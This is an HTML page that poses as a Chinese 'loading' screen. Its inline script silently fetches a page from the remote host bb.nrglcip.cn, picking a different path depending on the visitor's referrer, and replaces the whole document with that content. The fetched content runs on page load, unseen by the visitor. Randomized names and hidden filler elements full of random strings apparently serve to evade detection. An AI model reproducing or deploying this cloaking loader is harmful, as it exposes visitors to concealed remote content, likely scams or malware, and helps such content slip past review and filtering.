<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .s2maiG6uMN {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .s2maiG6uMN .LxGIpTnYC {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .s2maiG6uMN .content {
            line-height: 50px;
            text-align: center
        }

        .s2maiG6uMN .img {
            width: 100%
        }

        .s2maiG6uMN .Mc8VGLFHKis {
            text-align: center
        }

        .s2maiG6uMN .Mc8VGLFHKis span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .s2maiG6uMN .Mc8VGLFHKis span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .s2maiG6uMN .Mc8VGLFHKis span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .s2maiG6uMN .Mc8VGLFHKis span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .s2maiG6uMN .Mc8VGLFHKis span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .s2maiG6uMN .Mc8VGLFHKis span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .s2maiG6uMN .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function zpoOio89cxxVj(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var iF4cx = zpoOio89cxxVj('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ iF4cx +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ iF4cx +".html?a=share";
		}
		
        OeYDGRm543=url+"#"+new Date().getTime();
        OeYDGRm543 && function() {
            $.get(OeYDGRm543, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<ul style='display:none' >PKQqeuBer4lYxmeuYwN1xUYlOdUIt0jnBbtZFQsC7dAxUYdkU99BzmDiLQmEc</ul>
<span style='display:none'>o9iFLo2gimvKuinB1jDZgO3RO2oOtHEbueb18yTQtUDeXHIxKFgEVaM4vyddNIOsuaBQB</span>
<ul style='display:none' >PKQqeuBer4lYxmeuYwN1xUYlOdUIt0jnBbtZFQsC7dAxUYdkU99BzmDiLQmEc</ul>
<span style='display:none'>o9iFLo2gimvKuinB1jDZgO3RO2oOtHEbueb18yTQtUDeXHIxKFgEVaM4vyddNIOsuaBQB</span>
<img  src='' style='display:none'>
<p  style='display:none'>gnxIcy1l961IZAayygdxpZR2sQQpDQOSM</p>
<b style='display:none' >KxKKUA9bTy7I1c9PhNLeMHD060qc91ZhnIWsspLdvmJBDUM76FT9MNMhejF2onGdHEV2bdplJxXAe8Q</b>
<ul style='display:none' >PKQqeuBer4lYxmeuYwN1xUYlOdUIt0jnBbtZFQsC7dAxUYdkU99BzmDiLQmEc</ul><div class="s2maiG6uMN">
    <div class="LxGIpTnYC">
        <div class="Mc8VGLFHKis">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >BMIsMzopV5LPa9QoqoG7hV95mr2pVjE9coxYQNqYpNRafZ3nH9fIhH64tbK2s0T7Ir5ZDs0UFvd67edVMENl5Gzps</b>
<a  href='#' style='display:none'>fK1pmE1TQPaXgcphTxEzFYjmYxjWNiBfHPzOZHJZi4jiUvOu1Rzk30NyHHufZNCRjfWwtsbG3eFEe75eQc6iSuYwp9zNo</a>
<div style='display:none'>v43LIsEitpQsEBO5Ni961sQdDMeXBNaMhD6m9F209tqEJ8I30cJ8LrLZSuIUGWSXQNV1NDJHdVkB6yW2kjrVPzmA5L7Rom</div>
<li style='display:none' >jpkQR9JLXkIzbRyhToVlJDYCx4</li>
<li style='display:none' >jpkQR9JLXkIzbRyhToVlJDYCx4</li></body>
</html>